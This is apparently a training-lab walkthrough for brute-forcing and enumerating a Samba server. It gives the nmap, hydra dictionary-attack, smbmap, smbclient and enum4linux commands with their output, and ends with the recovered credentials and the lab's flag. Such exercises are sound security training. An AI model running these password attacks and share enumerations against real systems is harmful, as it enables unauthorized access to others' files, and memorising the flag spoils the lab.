🔬 Samba Recon: Dictionary Attack
Brute-force of SAMBA service
Enumeration, brute-force, tools and flags have been already covered in this SMB Enum Lab 6
ip -br -c a
nmap -sV 192.34.128.3
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: RECONLABS)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: RECONLABS)
📌 Server is running SAMBA on the standard port 445
gzip -d /usr/share/wordlists/rockyou.txt.gz
hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.34.128.3 smb
[445][smb] host: 192.34.128.3 login: admin password: password1
smbmap -H 192.34.128.3 -u admin -p password1
Disk Permissions
---- -----------
shawn READ, WRITE
nancy READ ONLY
admin READ, WRITE
IPC$ NO ACCESS
smbclient -L 192.34.128.3 -U admin
smbclient //192.34.128.3/shawn -U admin
help
dir
# check files and folders in that share
smbclient //192.34.128.3/nancy -U admin
smbclient //192.34.128.3/admin -U admin
cd hidden
get flag.tar.gz
exit
tar xzf flag.tar.gz
cat flag
enum4linux -a 192.34.128.3
# a = enumerate all information
enum4linux -a -u admin -p password1 192.34.128.3
Reveal Flag: 🚩
2727069bc058053bd561ce372721c92e
